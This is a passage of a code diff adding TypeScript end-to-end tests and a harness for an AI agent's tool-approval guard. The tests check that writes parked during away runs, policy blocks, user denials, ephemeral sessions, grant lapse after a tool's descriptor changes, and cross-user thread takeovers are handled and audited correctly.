+  type Env,
+} from "./harness.js";
+
+const SUBJECT = "user_away";
+const APP_ID = "app_auto";
+const TOOL = "host_invoices_send";
+const send = descriptor({ name: TOOL, risk: "write" });
+
+let env: Env;
+afterEach(async () => {
+  await env?.close();
+});
+
+function awayCtx(runId: string): RunContext {
+  return userCtx(SUBJECT, {
+    venue: "automation",
+    presence: "away",
+    appId: APP_ID,
+    trigger: { runId, kind: "schedule" },
+  });
+}
+
+async function runAway(
+  model: LanguageModel,
+  registry: ToolRegistry,
+  ctx: RunContext,
+  prompt: string,
+): Promise<AgentRunReport> {
+  const runner = env.agentFor(registry, model).asRunner();
+  return runner({ prompt, tools: env.bound(registry), budget: { maxToolCalls: 4 } }, ctx);
+}
+
+describe("scenario 6: away runner park + resume (05 §6)", () => {
+  it("parks an ungranted away write (fails soft), and only an automation-source app-bound grant authorizes the next away run", async () => {
+    env = await createEnv();
+
+    // --- Away run #1: ungranted write parks, fails soft ---------------------
+    const reg1 = new SpyRegistry([send], { [TOOL]: { sent: 1 } });
+    const report1 = await runAway(
+      scriptedModel([toolCallTurn(TOOL, { invoiceId: "inv_1" }, "c1"), textTurn("Parked.", "t1")]),
+      reg1,
+      awayCtx("run_1"),
+      "Send invoice 1",
+    );
+    expect(["ok", "stopped"]).toContain(report1.status); // no throw — fails soft
+    expect(report1.toolCalls).toEqual([
+      expect.objectContaining({ outcome: "pending-approval" }),
+    ]);
+    expect(reg1.count(TOOL)).toBe(0);
+    expect(await env.count("vendo_approvals", "status = 'pending'")).toBe(1);
+
+    // --- Decide with remember → source "chat", app-bound (core §5) ----------
+    const parked = await env.guard.approvals.pending({ kind: "user", subject: SUBJECT });
+    expect(parked).toHaveLength(1);
+    await env.guard.approvals.decide(
+      parked[0]!.id,
+      { approve: true, remember: { scope: { kind: "tool" }, duration: "standing" } },
+      { kind: "user", subject: SUBJECT },
+    );
+    const chatGrant = await env.sql<{ source: string; app_id: string | null }>(
+      "SELECT source, app_id FROM vendo_grants",
+    );
+    expect(chatGrant).toEqual([{ source: "chat", app_id: APP_ID }]);
+
+    // --- Away run #2: the chat grant does NOT authorize away (05 §6) --------
+    const reg2 = new SpyRegistry([send], { [TOOL]: { sent: 2 } });
+    const report2 = await runAway(
+      scriptedModel([toolCallTurn(TOOL, { invoiceId: "inv_2" }, "c2"), textTurn("Parked again.", "t2")]),
+      reg2,
+      awayCtx("run_2"),
+      "Send invoice 2",
+    );
+    expect(report2.toolCalls).toEqual([
+      expect.objectContaining({ outcome: "pending-approval" }),
+    ]);
+    expect(reg2.count(TOOL)).toBe(0); // still parks — chat-minted grants never authorize away
+
+    // --- Seed the automation-source app-bound grant enable-capture mints ----
+    await seedGrant(env.store, {
+      subject: SUBJECT,
+      descriptor: send,
+      appId: APP_ID,
+      source: "automation",
+      scope: { kind: "tool" },
+      duration: "standing",
+    });
+
+    // --- Away run #3: now it runs without asking ----------------------------
+    const pendingBefore = await env.count("vendo_approvals", "status = 'pending'");
+    const reg3 = new SpyRegistry([send], { [TOOL]: { sent: 3 } });
+    const report3 = await runAway(
+      scriptedModel([toolCallTurn(TOOL, { invoiceId: "inv_3" }, "c3"), textTurn("Sent.", "t3")]),
+      reg3,
+      awayCtx("run_3"),
+      "Send invoice 3",
+    );
+    expect(report3.toolCalls).toEqual([expect.objectContaining({ outcome: "ok" })]);
+    expect(reg3.count(TOOL)).toBe(1);
+    // No new approval parked.
+    expect(await env.count("vendo_approvals", "status = 'pending'")).toBe(pendingBefore);
+  });
+
+  it("a chat grant with no appId does not authorize an away run either", async () => {
+    env = await createEnv();
+    const toolB = descriptor({ name: "host_reports_email", risk: "write" });
+    // A present-chat standing grant, no appId — the ordinary chat grant shape.
+    await seedGrant(env.store, {
+      subject: SUBJECT,
+      descriptor: toolB,
+      source: "chat",
+      scope: { kind: "tool" },
+      duration: "standing",
+    });
+
+    const reg = new SpyRegistry([toolB], { [toolB.name]: { ok: true } });
+    const report = await runAway(
+      scriptedModel([toolCallTurn(toolB.name, { to: "a@b.co" }, "cb"), textTurn("Parked.", "tb")]),
+      reg,
+      awayCtx("run_b"),
+      "Email the report",
+    );
+
+    expect(report.toolCalls).toEqual([expect.objectContaining({ outcome: "pending-approval" })]);
+    expect(reg.count(toolB.name)).toBe(0);
+    expect(await env.count("vendo_approvals", "status = 'pending'")).toBe(1);
+  });
+});

--- a/fixtures/chat-e2e/src/blocked.e2e.test.ts
+++ b/fixtures/chat-e2e/src/blocked.e2e.test.ts
@@ -1,0 +1,70 @@
+/** Scenario 3 — BLOCKED, TOLD TO THE MODEL.
+ *
+ * A real policy rule blocks a tool. The block is never silently swallowed: the
+ * blocked outcome (with its reason) reaches the model's next-step prompt, and
+ * the audit trail records a policy-decision decidedBy the rule with outcome
+ * "blocked".
+ */
+import { afterEach, describe, expect, it } from "vitest";
+import {
+  auditEvents,
+  createEnv,
+  descriptor,
+  readSse,
+  scriptedModel,
+  SpyRegistry,
+  textTurn,
+  toolCallTurn,
+  userCtx,
+  userMessage,
+  type Env,
+} from "./harness.js";
+
+const SUBJECT = "user_block";
+const THREAD = "thr_block";
+const TOOL = "host_payouts_wire";
+const REASON = "wires are disabled for this workspace";
+const wire = descriptor({ name: TOOL, risk: "destructive" });
+
+let env: Env;
+afterEach(async () => {
+  await env?.close();
+});
+
+describe("scenario 3: blocked told to the model", () => {
+  it("tells the model the block reason and audits a policy-decision blocked by rule", async () => {
+    env = await createEnv({
+      policy: { rules: [{ match: { tool: TOOL }, action: "block", note: REASON }] },
+    });
+    const registry = new SpyRegistry([wire]);
+    const model = scriptedModel([
+      toolCallTurn(TOOL, { amountCents: 1000 }, "call_1"),
+      textTurn("That action is blocked, so I stopped.", "t1"),
+    ]);
+    const agent = env.agentFor(registry, model);
+    const ctx = userCtx(SUBJECT);
+
+    await readSse(
+      await agent.stream({ threadId: THREAD, message: userMessage("u1", "Wire the payout"), ctx }),
+    );
+
+    // Never executed.
+    expect(registry.count(TOOL)).toBe(0);
+
+    // The blocked outcome — carrying the reason — reached the model's next
+    // prompt. The scripted model records each prompt it was handed; the second
+    // one is the continuation after the tool returned blocked.
+    expect(model.prompts.length).toBeGreaterThanOrEqual(2);
+    expect(JSON.stringify(model.prompts)).toContain(REASON);
+
+    // SQL: a policy-decision audit event, decidedBy the rule, outcome blocked.
+    const events = await auditEvents(env, SUBJECT);
+    const blocked = events.filter(
+      (event) => event.kind === "policy-decision" && event.outcome === "blocked",
+    );
+    expect(blocked.length).toBeGreaterThanOrEqual(1);
+    expect(blocked[0]).toMatchObject({ tool: TOOL, decidedBy: "rule", outcome: "blocked" });
+    // And the executed-path tool-call event also records the blocked outcome.
+    expect(events.some((event) => event.kind === "tool-call" && event.outcome === "blocked")).toBe(true);
+  });
+});

--- a/fixtures/chat-e2e/src/deny.e2e.test.ts
+++ b/fixtures/chat-e2e/src/deny.e2e.test.ts
@@ -1,0 +1,79 @@
+/** Scenario 2 — DENY PATH.
+ *
+ * The model calls an asked tool → the user denies → the tool never executes,
+ * the model is told (SDK denied output), no grant is minted, and the approval
+ * row lands `denied`.
+ */
+import { afterEach, describe, expect, it } from "vitest";
+import {
+  createEnv,
+  descriptor,
+  lastAssistant,
+  partsOfType,
+  readSse,
+  respondToApproval,
+  scriptedModel,
+  SpyRegistry,
+  textTurn,
+  toolCallTurn,
+  userCtx,
+  userMessage,
+  vendoApprovalId,
+  type Env,
+} from "./harness.js";
+
+const SUBJECT = "user_deny";
+const THREAD = "thr_deny";
+const TOOL = "host_invoices_delete";
+const input = { invoiceId: "inv_9" };
+const del = descriptor({ name: TOOL, risk: "destructive" });
+
+let env: Env;
+afterEach(async () => {
+  await env?.close();
+});
+
+describe("scenario 2: deny path", () => {
+  it("never executes the tool, tells the model, mints no grant, and marks the approval denied", async () => {
+    env = await createEnv({ policy: { rules: [{ match: { tool: TOOL }, action: "ask" }] } });
+    const registry = new SpyRegistry([del]);
+    const model = scriptedModel([
+      toolCallTurn(TOOL, input, "call_1"),
+      textTurn("Understood — I won't delete it.", "t1"),
+    ]);
+    const agent = env.agentFor(registry, model);
+    const ctx = userCtx(SUBJECT);
+
+    const paused = await readSse(
+      await agent.stream({ threadId: THREAD, message: userMessage("u1", "Delete invoice 9"), ctx }),
+    );
+    const approvalId = vendoApprovalId(paused);
+    expect(await env.count("vendo_approvals")).toBe(1);
+
+    // Deny — no `remember`, so no grant.
+    await env.guard.approvals.decide(approvalId, { approve: false }, ctx.principal);
+
+    const assistant = await lastAssistant(agent, THREAD, ctx);
+    const resumed = await readSse(
+      await agent.stream({
+        threadId: THREAD,
+        message: respondToApproval(assistant, "call_1", TOOL, input, false),
+        ctx,
+      }),
+    );
+
+    // Spy proves the registry was never executed.
+    expect(registry.count(TOOL)).toBe(0);
+    // The model was told via the SDK denied output, and still produced a turn.
+    expect(partsOfType(resumed, "tool-output-denied")[0]).toMatchObject({ toolCallId: "call_1" });
+    expect(resumed.parts.some((part) => part.type === "text-delta" && part.delta === "Understood — I won't delete it.")).toBe(true);
+
+    // SQL: approval denied, zero grants.
+    const approvalRow = await env.sql<{ status: string }>(
+      "SELECT status FROM vendo_approvals WHERE id = $1",
+      [approvalId],
+    );
+    expect(approvalRow[0]?.status).toBe("denied");
+    expect(await env.count("vendo_grants")).toBe(0);
+  });
+});

--- a/fixtures/chat-e2e/src/ephemeral.e2e.test.ts
+++ b/fixtures/chat-e2e/src/ephemeral.e2e.test.ts
@@ -1,0 +1,92 @@
+/** Scenario 5 — EPHEMERAL PRINCIPAL.
+ *
+ * An ephemeral principal runs a full turn including an approval decided in the
+ * same session — everything works — but NOTHING touches disk (02 §4: ephemeral
+ * principals get an adapter-level in-memory overlay). The turn is proven live
+ * (the tool ran, the thread is readable), while every vendo_* table shows zero
+ * rows for the subject.
+ */
+import { afterEach, describe, expect, it } from "vitest";
+import {
+  createEnv,
+  descriptor,
+  ephemeralCtx,
+  lastAssistant,
+  partsOfType,
+  readSse,
+  respondToApproval,
+  scriptedModel,
+  SpyRegistry,
+  textTurn,
+  toolCallTurn,
+  userMessage,
+  vendoApprovalId,
+  type Env,
+} from "./harness.js";
+
+const SUBJECT = "guest_ghost";
+const THREAD = "thr_ghost";
+const TOOL = "host_notes_write";
+const input = { text: "hi" };
+const write = descriptor({ name: TOOL, risk: "write" });
+
+let env: Env;
+afterEach(async () => {
+  await env?.close();
+});
+
+describe("scenario 5: ephemeral principal", () => {
+  it("runs a full approval turn in-session while writing zero rows to disk", async () => {
+    env = await createEnv({ policy: { rules: [{ match: { tool: TOOL }, action: "ask" }] } });
+    const registry = new SpyRegistry([write], { [TOOL]: { wrote: true } });
+    const model = scriptedModel([
+      toolCallTurn(TOOL, input, "call_1"),
+      textTurn("Saved your note.", "t1"),
+    ]);
+    const agent = env.agentFor(registry, model);
+    const ctx = ephemeralCtx(SUBJECT);
+
+    // Turn 1: parks. The approval is queryable (from the overlay) but not on disk.
+    const paused = await readSse(
+      await agent.stream({ threadId: THREAD, message: userMessage("u1", "Save a note"), ctx }),
+    );
+    const approvalId = vendoApprovalId(paused);
+    const pending = await env.guard.approvals.pending(ctx.principal);
+    expect(pending.map((request) => request.id)).toEqual([approvalId]);
+    expect(await env.count("vendo_approvals")).toBe(0); // overlay only — nothing on disk
+
+    // Decide (remember standing) and resume in-session.
+    await env.guard.approvals.decide(
+      approvalId,
+      { approve: true, remember: { scope: { kind: "tool" }, duration: "standing" } },
+      ctx.principal,
+    );
+    const assistant = await lastAssistant(agent, THREAD, ctx);
+    const resumed = await readSse(
+      await agent.stream({
+        threadId: THREAD,
+        message: respondToApproval(assistant, "call_1", TOOL, input, true),
+        ctx,
+      }),
+    );
+
+    // The turn genuinely ran end-to-end.
+    expect(registry.count(TOOL)).toBe(1);
+    expect(partsOfType(resumed, "tool-output-available")[0]).toMatchObject({
+      toolCallId: "call_1",
+      output: { status: "ok", output: { wrote: true } },
+    });
+    const thread = await agent.threads.get(THREAD, ctx);
+    expect(thread).not.toBeNull();
+    expect(thread!.subject).toBe(SUBJECT);
+
+    // 02 §4: NOTHING for this subject ever touched disk — threads, approvals,
+    // grants, and audit all stayed in the in-memory overlay.
+    expect(await env.count("vendo_threads", "subject = $1", [SUBJECT])).toBe(0);
+    expect(await env.count("vendo_approvals", "subject = $1", [SUBJECT])).toBe(0);
+    expect(await env.count("vendo_grants", "subject = $1", [SUBJECT])).toBe(0);
+    expect(await env.count("vendo_audit", "subject = $1", [SUBJECT])).toBe(0);
+    // The grant still exists in-session (proves it was minted, just not on disk).
+    expect(await env.guard.grants.list(ctx.principal)).toHaveLength(1);
+  });
+});

--- a/fixtures/chat-e2e/src/grant-drift.e2e.test.ts
+++ b/fixtures/chat-e2e/src/grant-drift.e2e.test.ts
@@ -1,0 +1,87 @@
+/** Scenario 4 — GRANT DRIFT ACROSS THE CHAT PATH.
+ *
+ * A standing grant is minted for a tool. When the tool's descriptor drifts
+ * (its risk changes → its descriptorHash changes), the grant no longer matches
+ * — so the same call asks again. The lapse is observed through the full agent
+ * stream (needsApproval → guard), not the guard in isolation.
+ */
+import { afterEach, describe, expect, it } from "vitest";
+import { descriptorHash } from "@vendoai/core";
+import {
+  createEnv,
+  descriptor,
+  partsOfType,
+  readSse,
+  scriptedModel,
+  SpyRegistry,
+  textTurn,
+  toolCallTurn,
+  userCtx,
+  userMessage,
+  vendoApprovalId,
+  type Env,
+} from "./harness.js";
+
+const SUBJECT = "user_drift";
+const TOOL = "host_widget_update";
+// Same name; the risk (and therefore the descriptorHash) drifts read→destructive.
+const d1 = descriptor({ name: TOOL, risk: "write" });
+const d2 = descriptor({ name: TOOL, risk: "destructive" });
+
+let env: Env;
+afterEach(async () => {
+  await env?.close();
+});
+
+describe("scenario 4: grant drift across the chat path", () => {
+  it("mints a standing grant, honors it, then asks again once the descriptor drifts", async () => {
+    env = await createEnv({ policy: { rules: [{ match: { tool: TOOL }, action: "ask" }] } });
+
+    // --- Mint a standing tool-scope grant (park + decide remember) ----------
+    const registry1 = new SpyRegistry([d1], { [TOOL]: { ok: 1 } });
+    const model1 = scriptedModel([
+      toolCallTurn(TOOL, { id: "w1" }, "call_1"), // stream #1: parks
+      toolCallTurn(TOOL, { id: "w2" }, "call_2"), // stream #2: runs via grant
+      textTurn("Updated.", "t1"), //                stream #2 continues
+    ]);
+    const agent1 = env.agentFor(registry1, model1);
+    const ctx = userCtx(SUBJECT);
+
+    const paused = await readSse(
+      await agent1.stream({ threadId: "thr_drift", message: userMessage("u1", "Update w1"), ctx }),
+    );
+    await env.guard.approvals.decide(
+      vendoApprovalId(paused),
+      { approve: true, remember: { scope: { kind: "tool" }, duration: "standing" } },
+      ctx.principal,
+    );
+
+    const grants = await env.sql<{ descriptor_hash: string }>("SELECT descriptor_hash FROM vendo_grants");
+    expect(grants).toHaveLength(1);
+    expect(grants[0]?.descriptor_hash).toBe(descriptorHash(d1));
+
+    // --- The grant authorizes a fresh call while the descriptor is stable ---
+    const stable = await readSse(
+      await agent1.stream({ threadId: "thr_drift", message: userMessage("u2", "Update w2"), ctx }),
+    );
+    expect(partsOfType(stable, "tool-approval-request")).toHaveLength(0);
+    expect(registry1.count(TOOL)).toBe(1);
+
+    // --- Drift: re-bind a registry whose descriptor changed risk -----------
+    const registry2 = new SpyRegistry([d2], { [TOOL]: { ok: 2 } });
+    const model2 = scriptedModel([toolCallTurn(TOOL, { id: "w3" }, "call_3")]);
+    const agent2 = env.agentFor(registry2, model2);
+
+    const drifted = await readSse(
+      await agent2.stream({ threadId: "thr_drift2", message: userMessage("u3", "Update w3"), ctx }),
+    );
+
+    // The drifted descriptor no longer matches the grant → it asks again,
+    // observed through the full agent stream, and nothing executed.
+    expect(partsOfType(drifted, "tool-approval-request")).toHaveLength(1);
+    expect(registry2.count(TOOL)).toBe(0);
+    const stillPending = await env.guard.approvals.pending(ctx.principal);
+    expect(stillPending).toHaveLength(1);
+    expect(stillPending[0]?.descriptor.risk).toBe("destructive");
+  });
+});

--- a/fixtures/chat-e2e/src/harness.ts
+++ b/fixtures/chat-e2e/src/harness.ts
@@ -1,0 +1,383 @@
+/** The chat-path e2e harness: composes REAL blocks the way the umbrella
+ * (09 §2) will — real PGlite store, real guard (createGuard + guard.bind), real
+ * agent (createAgent / asRunner) — around a scripted deterministic
+ * LanguageModel, and asserts side effects with raw SQL over the vendo_* tables.
+ *
+ * The dependency-guard pins packages/agent → core only and scans its tests, so
+ * this cross-block wiring cannot live inside the agent package; it lives here,
+ * in a fixture the guard never scans (scripts/dependency-guard.mjs only walks
+ * packages/*).
+ */
+import { mkdtemp, rm } from "node:fs/promises";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+import {
+  canonicalJson,
+  descriptorHash,
+  sha256Hex,
+  type ApprovalDecision,
+  type ApprovalId,
+  type AuditEvent,
+  type GrantDuration,
+  type GrantScope,
+  type Json,
+  type PermissionGrant,
+  type Principal,
+  type RunContext,
+  type ToolCall,
+  type ToolDescriptor,
+  type ToolOutcome,
+  type ToolRegistry,
+} from "@vendoai/core";
+import { createStore, type VendoStore } from "@vendoai/store";
+import { createGuard, type PolicyConfig, type VendoGuard } from "@vendoai/guard";
+import { createAgent, type VendoAgent } from "@vendoai/agent";
+import {
+  MockLanguageModelV3,
+  simulateReadableStream,
+} from "ai/test";
+import type { LanguageModel, UIMessage } from "ai";
+import { expect } from "vitest";
+
+// ---------------------------------------------------------------------------
+// Scripted LanguageModel (the agent tests' technique, copied — the fixture
+// cannot import packages/agent/src/test-helpers, it is not a package export).
+// ---------------------------------------------------------------------------
+
+type LanguageModelV3Prompt = Parameters<MockLanguageModelV3["doStream"]>[0]["prompt"];
+type LanguageModelV3StreamPart = Awaited<
+  ReturnType<MockLanguageModelV3["doStream"]>
+>["stream"] extends ReadableStream<infer Part> ? Part : never;
+type LanguageModelV3GenerateResult = Awaited<ReturnType<MockLanguageModelV3["doGenerate"]>>;
+type LanguageModelV3Content = LanguageModelV3GenerateResult["content"][number];
+
+export const ZERO_USAGE = {
+  inputTokens: { total: 0, noCache: 0, cacheRead: 0, cacheWrite: 0 },
+  outputTokens: { total: 0, text: 0, reasoning: 0 },
+} as const;
+
+export function textTurn(text: string, id = "text_1"): LanguageModelV3StreamPart[] {
+  return [
+    { type: "text-start", id },
+    { type: "text-delta", id, delta: text },
+    { type: "text-end", id },
+    { type: "finish", usage: ZERO_USAGE, finishReason: { unified: "stop", raw: undefined } },
+  ];
+}
+
+export function toolCallTurn(
+  toolName: string,
+  input: unknown,
+  toolCallId = "call_1",
+): LanguageModelV3StreamPart[] {
+  return [
+    { type: "tool-call", toolCallId, toolName, input: JSON.stringify(input) },
+    { type: "finish", usage: ZERO_USAGE, finishReason: { unified: "tool-calls", raw: undefined } },
+  ];
+}
+
+export type ScriptedModel = MockLanguageModelV3 & {
+  prompts: LanguageModelV3Prompt[];
+};
+
+export function scriptedModel(turns: LanguageModelV3StreamPart[][]): ScriptedModel {
+  const remaining = turns.map((turn) => [...turn]);
+  const prompts: LanguageModelV3Prompt[] = [];
+  const shift = (prompt: LanguageModelV3Prompt): LanguageModelV3StreamPart[] => {
+    prompts.push(structuredClone(prompt));
+    const chunks = remaining.shift();
+    if (chunks === undefined) throw new Error("scripted model exhausted");
+    return chunks;
+  };
+  const model = new MockLanguageModelV3({
+    doStream: async (request) => {
+      const chunks = shift(request.prompt);
+      return { stream: simulateReadableStream({ chunks }) };
+    },
+    doGenerate: async (request): Promise<LanguageModelV3GenerateResult> => {
+      const chunks = shift(request.prompt);
+      const finish = chunks.find((part) => part.type === "finish");
+      const content: LanguageModelV3Content[] = [];
+      const text = chunks
+        .filter((part): part is Extract<LanguageModelV3StreamPart, { type: "text-delta" }> => part.type === "text-delta")
+        .map((part) => part.delta)
+        .join("");
+      if (text.length > 0) content.push({ type: "text", text });
+      for (const part of chunks) {
+        if (part.type === "tool-call") content.push(structuredClone(part));
+      }
+      return {
+        content,
+        finishReason: finish?.finishReason ?? { unified: "stop", raw: undefined },
+        usage: finish?.usage ?? ZERO_USAGE,
+        warnings: [],
+      };
+    },
+  }) as ScriptedModel;
+  model.prompts = prompts;
+  return model;
+}
+
+// ---------------------------------------------------------------------------
+// Spy tool registry — the UNBOUND ToolRegistry handed to guard.bind. Real
+// executions (the ones the guard actually lets through) are counted, so tests
+// can assert "ran exactly once" / "never ran".
+// ---------------------------------------------------------------------------
+
+export function descriptor(
+  overrides: Partial<ToolDescriptor> & { name: string },
+): ToolDescriptor {
+  return {
+    description: `${overrides.name} fixture tool`,
+    inputSchema: { type: "object", additionalProperties: true },
+    risk: "write",
+    ...overrides,
+  };
+}
+
+export class SpyRegistry implements ToolRegistry {
+  readonly calls: Array<{ call: ToolCall; ctx: RunContext }> = [];
+  readonly #descriptors: ToolDescriptor[];
+  readonly #outputs: Record<string, Json>;
+
+  constructor(descriptors: ToolDescriptor[], outputs: Record<string, Json> = {}) {
+    this.#descriptors = descriptors;
+    this.#outputs = outputs;
+  }
+
+  /** Real executions per tool name — only increments when the guard runs it. */
+  count(tool: string): number {
+    return this.calls.filter((entry) => entry.call.tool === tool).length;
+  }
+
+  async descriptors(): Promise<ToolDescriptor[]> {
+    return this.#descriptors.map((value) => structuredClone(value));
+  }
+
+  async execute(call: ToolCall, ctx: RunContext): Promise<ToolOutcome> {
+    this.calls.push({ call: structuredClone(call), ctx: structuredClone(ctx) });
+    return { status: "ok", output: this.#outputs[call.tool] ?? { ran: call.tool } };
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Environment: one real store + one real guard, agents/runners built on demand.
+// ---------------------------------------------------------------------------
+
+export interface Env {
+  store: VendoStore;
+  guard: VendoGuard;
+  /** guard.bind(registry) — the one sanctioned path to execution (05 §2). */
+  bound(registry: ToolRegistry): ToolRegistry;
+  /** A real agent whose tools are guard-bound over this registry. */
+  agentFor(registry: ToolRegistry, model: LanguageModel): VendoAgent;
+  /** Raw SQL over the real store (store.raw()) — the vendo_* table asserts. */
+  sql<Row = Record<string, unknown>>(query: string, params?: unknown[]): Promise<Row[]>;
+  count(table: string, where?: string, params?: unknown[]): Promise<number>;
+  close(): Promise<void>;
+}
+
+export interface EnvOptions {
+  policy?: PolicyConfig;
+}
+
+export async function createEnv(options: EnvOptions = {}): Promise<Env> {
+  const dataDir = await mkdtemp(join(tmpdir(), "vendo-chat-e2e-"));
+  const store = createStore({ dataDir });
+  await store.ensureSchema();
+  const guard = createGuard({
+    store,
+    ...(options.policy === undefined ? {} : { policy: options.policy }),
+  });
+
+  const raw = store.raw() as { query(q: string, p?: unknown[]): Promise<{ rows: unknown[] }> };
+
+  const sql = async <Row = Record<string, unknown>>(query: string, params?: unknown[]): Promise<Row[]> => {
+    const result = await raw.query(query, params);
+    return result.rows as Row[];
+  };
+
+  const count = async (table: string, where?: string, params?: unknown[]): Promise<number> => {
+    const clause = where === undefined ? "" : ` WHERE ${where}`;
+    const rows = await sql<{ count: unknown }>(
+      `SELECT COUNT(*)::int AS count FROM ${table}${clause}`,
+      params,
+    );
+    return Number(rows[0]?.count ?? 0);
+  };
+
+  return {
+    store,
+    guard,
+    bound: (registry) => guard.bind(registry),
+    agentFor: (registry, model) =>
+      createAgent({ model, tools: guard.bind(registry), guard, store }),
+    sql,
+    count,
+    async close() {
+      await store.close();
+      await rm(dataDir, { recursive: true, force: true });
+    },
+  };
+}
+
+// ---------------------------------------------------------------------------
+// Context + principal helpers
+// ---------------------------------------------------------------------------
+
+export function userCtx(subject: string, overrides: Partial<RunContext> = {}): RunContext {
+  const principal: Principal = { kind: "user", subject };
+  return {
+    principal,
+    venue: "chat",
+    presence: "present",
+    sessionId: `sess_${subject}`,
+    ...overrides,
+  };
+}
+
+export function ephemeralCtx(subject: string, overrides: Partial<RunContext> = {}): RunContext {
+  const principal: Principal = { kind: "user", subject, ephemeral: true };
+  return {
+    principal,
+    venue: "chat",
+    presence: "present",
+    sessionId: `sess_${subject}`,
+    ...overrides,
+  };
+}
+
+// ---------------------------------------------------------------------------
+// Grant seeding (mimics enable-capture / prior grants without a live model) —
+// exactly the guard-fixture pattern, writing through the store's grant table.
+// ---------------------------------------------------------------------------
+
+export async function seedGrant(
+  store: VendoStore,
+  options: {
+    subject: string;
+    descriptor: ToolDescriptor;
+    scope?: GrantScope;
+    duration?: GrantDuration;
+    appId?: string;
+    source?: PermissionGrant["source"];
+  },
+): Promise<PermissionGrant> {
+  const grant: PermissionGrant = {
+    id: `grt_${globalThis.crypto.randomUUID()}`,
+    subject: options.subject,
+    tool: options.descriptor.name,
+    descriptorHash: descriptorHash(options.descriptor),
+    scope: options.scope ?? { kind: "tool" },
+    duration: options.duration ?? "standing",
+    ...(options.appId === undefined ? {} : { appId: options.appId }),
+    source: options.source ?? "chat",
+    grantedAt: new Date().toISOString(),
+  };
+  await store.records("vendo_grants").put({
+    id: grant.id,
+    data: grant,
+    refs: {
+      subject: grant.subject,
+      tool: grant.tool,
+      ...(grant.appId === undefined ? {} : { app_id: grant.appId }),
+    },
+  });
+  return grant;
+}
+
+export function exactScope(tool: string, args: unknown): GrantScope {
+  return {
+    kind: "exact",
+    inputHash: `sha256:${sha256Hex(canonicalJson(args))}`,
+    inputPreview: `${tool} ${canonicalJson(args)}`,
+  };
+}
+
+// ---------------------------------------------------------------------------
+// Agent stream / approval-resume plumbing (the ai-SDK UI-message-stream wire).
+// ---------------------------------------------------------------------------
+
+export interface StreamRead {
+  parts: Array<Record<string, unknown>>;
+}
+
+export async function readSse(response: Response): Promise<StreamRead> {
+  const raw = await response.text();
+  expect(raw.endsWith("\n\n")).toBe(true);
+  const blocks = raw.slice(0, -2).split("\n\n");
+  const parts = blocks
+    .filter((block) => block.startsWith("data: ") && block !== "data: [DONE]")
+    .map((block) => JSON.parse(block.slice("data: ".length)) as Record<string, unknown>);
+  return { parts };
+}
+
+export function partsOfType(read: StreamRead, type: string): Array<Record<string, unknown>> {
+  return read.parts.filter((part) => part.type === type);
+}
+
+/** The core approvalId (apr_...) surfaced beside the native tool part. */
+export function vendoApprovalId(read: StreamRead): ApprovalId {
+  const part = partsOfType(read, "data-vendo-approval")[0];
+  expect(part).toBeDefined();
+  return part!.approvalId as ApprovalId;
+}
+
+/** The native (ai-SDK) approval id — carried back on the resume message. */
+export function nativeApprovalId(read: StreamRead): string {
+  const part = partsOfType(read, "tool-approval-request")[0];
+  expect(part).toBeDefined();
+  return part!.approvalId as string;
+}
+
+export async function lastAssistant(agent: VendoAgent, threadId: string, ctx: RunContext): Promise<UIMessage> {
+  const thread = await agent.threads.get(threadId, ctx);
+  expect(thread).not.toBeNull();
+  const assistant = [...thread!.messages].reverse().find((message) => message.role === "assistant");
+  expect(assistant).toBeDefined();
+  return assistant!;
+}
+
+/** Flip the parked tool part to `approval-responded` so the next stream() resumes it. */
+export function respondToApproval(
+  message: UIMessage,
+  toolCallId: string,
+  toolName: string,
+  input: unknown,
+  approved: boolean,
+): UIMessage {
+  let updated = false;
+  const parts = message.parts.map((part) => {
+    const candidate = part as unknown as Record<string, unknown>;
+    if (candidate.type !== "dynamic-tool" || candidate.toolCallId !== toolCallId) return part;
+    updated = true;
+    return {
+      type: "dynamic-tool",
+      toolName,
+      toolCallId,
+      state: "approval-responded",
+      input,
+      approval: { id: nativeId(candidate), approved },
+    } as unknown as UIMessage["parts"][number];
+  });
+  expect(updated).toBe(true);
+  return { ...message, parts };
+}
+
+function nativeId(part: Record<string, unknown>): string {
+  const approval = part.approval as { id?: unknown } | undefined;
+  if (approval && typeof approval.id === "string") return approval.id;
+  throw new Error("tool part carried no native approval id");
+}
+
+export function userMessage(id: string, text: string): UIMessage {
+  return { id, role: "user", parts: [{ type: "text", text }] };
+}
+
+export async function auditEvents(env: Env, subject: string): Promise<AuditEvent[]> {
+  const rows = await env.sql<{ event: AuditEvent }>(
+    "SELECT event FROM vendo_audit WHERE subject = $1 ORDER BY at ASC",
+    [subject],
+  );
+  return rows.map((row) => row.event);
+}

--- a/fixtures/chat-e2e/src/thread-scoping.e2e.test.ts
+++ b/fixtures/chat-e2e/src/thread-scoping.e2e.test.ts
@@ -6,6 +6,7 @@
  * agent keys reserved vendo_threads rows by the bare thread id and enforces
  * subject scoping on read/delete (the bug this wave fixed in @vendoai/agent).
  */
+import { threadStore } from "@vendoai/store";
 import { afterEach, describe, expect, it } from "vitest";
 import {
   createEnv,
@@ -99,5 +100,67 @@ describe("scenario 7: thread persistence + subject scoping", () => {
     expect(JSON.stringify(after[0]!.messages)).not.toContain("Bob's takeover");
     expect(await env.count("vendo_threads", "subject = $1", [BOB])).toBe(0);
     expect(await env.count("vendo_threads")).toBe(1);
+  });
+
+  it("refuses a PERSIST-TIME cross-subject takeover atomically at the store door (B1)", async () => {
+    env = await createEnv();
+    const THR = "thr_persist_race";
+
+    // Ada owns the row on disk (the victim that appears/exists when persist runs,
+    // even if a resolve()-time pre-check had passed for a now-stale view).
+    await threadStore(env.store).put(userCtx(ADA).principal, {
+      id: THR,
+      messages: [{ role: "user", parts: [{ type: "text", text: "Ada's message" }] }],
+    });
+
+    // Bob's persist writing the SAME bare id must be refused by the store's guarded
+    // upsert — the TOCTOU window a resolve()-time check alone cannot close.
+    await expect(
+      threadStore(env.store).put(userCtx(BOB).principal, {
+        id: THR,
+        messages: [{ role: "user", parts: [{ type: "text", text: "Bob's takeover" }] }],
+      }),
+    ).rejects.toMatchObject({ code: "conflict" });
+
+    // SQL proof: Ada's row is untouched, Bob owns nothing.
+    const rows = await env.sql<{ subject: string; messages: unknown }>(
+      "SELECT subject, messages FROM vendo_threads WHERE id = $1",
+      [THR],
+    );
+    expect(rows).toHaveLength(1);
+    expect(rows[0]!.subject).toBe(ADA);
+    expect(JSON.stringify(rows[0]!.messages)).not.toContain("Bob's takeover");
